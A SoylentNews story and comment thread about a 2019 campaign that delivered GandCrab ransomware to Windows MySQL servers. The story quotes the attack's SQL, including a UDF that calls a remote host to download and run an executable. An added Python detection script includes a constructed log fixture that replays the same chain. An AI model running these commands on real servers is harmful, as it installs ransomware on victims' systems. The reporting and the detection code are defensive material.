
posted by Fnord666 on Monday May 27 2019, @09:13PM
from the don't-do-that dept.

Sophos has uncovered a wave of attacks targeting servers running MySQL on Windows.

The attack delivers the GandCrab ransomware.

The attackers attempt to connect to the database server and establish that it is running a MySQL instance.

The attacker then uses the SET command to load all the bytes of the helper DLL into a variable in memory and writes the contents of that variable out to a database table named yongger2.

The attacker concatenates the bytes into one file and drops it into the server's plugin directory. Analysis of the DLL revealed that it adds the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.

The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

The command to invoke the xpdl3 function is:

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe')

Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine, drop it in the root of the C: drive as isetup.exe, and execute it.

Tracking back through the attack chain, the researchers determined that the malware had been downloaded from the source ~3100 times since mid-April. Each download potentially indicates an infection, although presumably some, as in Sophos' case, were honeypots where no actual damage was done. The user interface of the system (geolocated in Arizona) hosting the malware is in simplified Chinese.

While not a widespread attack by numbers, it does represent a significant risk to MySQL databases exposed online.
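Detection logic for the chain described above, written from the defender's side as an added example (it is not code from the Sophos report or this story): it walks MySQL general-query-log lines per connection and flags the connection that stages a hex blob, writes a file, registers a UDF via SONAME and then calls a function with a URL argument. The log excerpt is constructed, with placeholder IP addresses and plugin path; the write to the plugin directory is assumed here to use INTO DUMPFILE.

```python
import re

# Constructed MySQL general-log excerpt (timestamp, thread id, command, argument).
# IPs, path and times are placeholders, not the indicators from the Sophos report.
SAMPLE_LOG = """\
2019-05-27T09:13:01Z   12 Connect  root@203.0.113.9 on  using TCP/IP
2019-05-27T09:13:02Z   12 Query    SET @a = 0x4d5a90000300000004000000ffff0000b800
2019-05-27T09:13:02Z   12 Query    CREATE TABLE yongger2 (data LONGBLOB)
2019-05-27T09:13:03Z   12 Query    INSERT INTO yongger2 VALUES (@a)
2019-05-27T09:13:04Z   12 Query    SELECT data FROM yongger2 INTO DUMPFILE 'C:/mysql/lib/plugin/cna12.dll'
2019-05-27T09:13:05Z   12 Query    DROP TABLE yongger2
2019-05-27T09:13:05Z   12 Query    CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
2019-05-27T09:13:06Z   12 Query    select xpdl3('hxxp://203.0.113.10:5471/3306-1[.]exe','c:\\\\isetup.exe')
2019-05-27T09:14:00Z   13 Connect  app@10.0.0.5 on shop using TCP/IP
2019-05-27T09:14:01Z   13 Query    SELECT id, name FROM products WHERE id = 7
2019-05-27T09:14:02Z   13 Query    INSERT INTO audit VALUES (0x01)
"""

# One regex per stage of the chain; the DUMPFILE stage is an assumption (see lead-in).
STAGES = [
    ("hex_blob",   re.compile(r"\bSET\s+@\w+\s*=\s*0x[0-9a-f]{32,}", re.I)),
    ("file_write", re.compile(r"\bINTO\s+(?:DUMP|OUT)FILE\s+'[^']*'", re.I)),
    ("udf_create", re.compile(r"\bCREATE\s+FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME\b", re.I)),
    ("udf_call",   re.compile(r"\b\w+\s*\(\s*'h(?:tt|xx)ps?://", re.I)),  # also matches defanged URLs
]
LINE = re.compile(r"^\S+\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")

def scan_log(text):
    """Return {thread_id: [stage names, in the order first seen]} for every connection."""
    seen = {}
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        stages = seen.setdefault(m.group("tid"), [])
        if m.group("cmd") != "Query":
            continue
        for name, rx in STAGES:
            if rx.search(m.group("arg")) and name not in stages:
                stages.append(name)
    return seen

def udf_chain_alerts(text):
    """Alert on any connection that registers a UDF from a SONAME and performed at
    least one other stage of the chain; CREATE FUNCTION ... SONAME alone is worth logging."""
    return [(tid, st) for tid, st in scan_log(text).items()
            if "udf_create" in st and len(st) >= 2]

if __name__ == "__main__":
    for tid, stages in udf_chain_alerts(SAMPLE_LOG):
        print(f"thread {tid}: {' -> '.join(stages)}")
```

On a live server the same patterns apply to the general log or audit-plugin output; an alert on the udf_create stage alone is a reasonable baseline, since legitimate UDF registration is rare and should be change-controlled.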

Detailed Analysis


  • (Score: 4, Interesting) by NotSanguine on Monday May 27 2019, @10:00PM (9 children)

    Even so, how does an anonymous connection have the privileges to add and drop tables/functions, *let alone* write data directly to the filesystem?

    I did read TFA and they don't mention any attempts at bypassing authentication. At the same time, the "compromise" of the Sophos MySQL instance wasn't actually on an instance of MySQL. Rather it was a honeypot [wikipedia.org] that just accepted any connections/commands sent to it.

    I'd expect that any MySQL instance that allows such access has either not been secured and/or poor configuration made this possible. Add/drop and filesystem access privileges on MySQL should be restricted to root and MySQL users *explicitly* granted such privileges.

    I'm glad I don't run MySQL and use MariaDB instead. :)

    --
    No, no, you're not thinking; you're just being logical. --Niels Bohr
  • (Score: 1, Interesting) by Anonymous Coward on Monday May 27 2019, @10:46PM (#848300) (5 children)

    Right, among the layers of configuration which are important are those perms.

    But you're overlooking scenarios. Dev DB servers often are more permissive, credentials are sometimes re-used or exposed, etc. This isn't a worm-scale problem. It's escalation. But escalation still matters. This isn't even a bug, really, it's just malware taking advantage of built-in abilities.

    Now, probably 0.01% or fewer MySQL users actually do stuff with filehandles or DLL rebinds from within MySQL, so one might classify those features as bugs - but right now they're documented as features, *for* the <0.01%, because at some point someone wanted them enough to warrant building them.

    And Buzz, I appreciate the sentiment behind

    database servers are on their own internal network. These things can be separated out so that an employee computer has no access whatsoever to other sensitive internal networks.

    but as you're well aware that's normally literally impossible if there's IT staff, since IT staff need a way to repair the machine, and 90%+ odds they can't easily show up and plug into the physical admin port. And developers and DevOps and yadda also often need fingers in pies.

    • (Score: 3, Interesting) by NotSanguine on Monday May 27 2019, @11:03PM (2 children)

      Reasonable points.

      However, under what circumstances is it appropriate to expose TCP/3306 to the Internet on a dev server (or a production server for that matter)?

      I'm sure we both could come up with some *plausible* scenarios where that could happen, but that doesn't make it appropriate or a good idea.

      If we surveyed those who were impacted by this (assuming they would own up to it), I suspect we'd find that the majority were either ignorant or just plain stupid and didn't secure their environments.

      Which reminds me of an incident back in the early 90s, when I was working for a Fortune 50 company that had recently connected their networks to the Internet.

      An employee was (no surprise there) downloading porn from the 'net. But they decided to store their downloaded files on a shared Netware volume. Once the porn was discovered, it was clear who was responsible, as they were the owner of the files.

      The employee was terminated. At the time, I noted that he wasn't fired for downloading porn, he was fired for being stupid.

      This applies in spades here, IMHO.

      --
      No, no, you're not thinking; you're just being logical. --Niels Bohr
      • (Score: 0) by Anonymous Coward on Wednesday May 29 2019, @03:01AM (#848753) (1 child)

        You're totally right that the internet-facing 3306es are stupid misconfiguration. I think we're eye to eye on that.

        But I don't agree about "who were impacted by this" unless you mean by this particular actor under analysis, and not the general vector. The specific actor is just Shodaning for 3360 and taking advantage and you're right, the odds that this is the only insecurity exposed by those machines is nearly nil.

    • (Score: 5, Interesting) by The Mighty Buzzard on Monday May 27 2019, @11:05PM (1 child)

      There's a big difference between giving IT staff full root on every box and every service without authentication and sanity though. Even ultra all-systems, all-services admins shouldn't default to having the keys to the kingdom from logging in to one box. I'd have to authenticate three different ways and ssh in from another SN server to monkey with the SN database with enough perms to do something like this (were we running windows so it was possible) when I've got keys to everything but the money. And we don't even put any serious brain power into figuring out how to better secure things here unless we're just bored and feel like doing so.

      --
      My rights don't end where your fear begins.
      • (Score: 0) by Anonymous Coward on Tuesday May 28 2019, @07:58AM (#848434)

        And we don't even put any serious brain power into figuring out how to better secure things here unless we're just bored and feel like doing so.

        You have to have something in the first place to put that something into, no?

  • (Score: 0) by Anonymous Coward on Monday May 27 2019, @10:49PM (#848302) (2 children)

    Well, you see ... it's kind of like this [xkcd.com] ... except not as ripe for memehood.

    • (Score: 2) by NotSanguine on Monday May 27 2019, @11:04PM (1 child)

      Oh the saga of little Bobby Tables!

      It warms the cockles of my heart!

      Pulling shit like that is almost enough for me to want to sire children. :)

      --
      No, no, you're not thinking; you're just being logical. --Niels Bohr
      • (Score: 2, Interesting) by RandomFactor (3682) Subscriber Badge on Tuesday May 28 2019, @09:48PM (#848676) Journal

        Treasured moments.
        .
        When my daughter got her stereo as a child, I carefully turned it on and listened to it at different volumes and locations, walked around a bit, listened from the other room and finally laid down the law. You must NEVER turn the stereo up to 11.

        It was over ten years before that one came due.
        .
        .
        .
        .
        .
        "My entire life was based on a MEME?!?!"

        --
        There is no news in Pravda, and no truth in Izvestia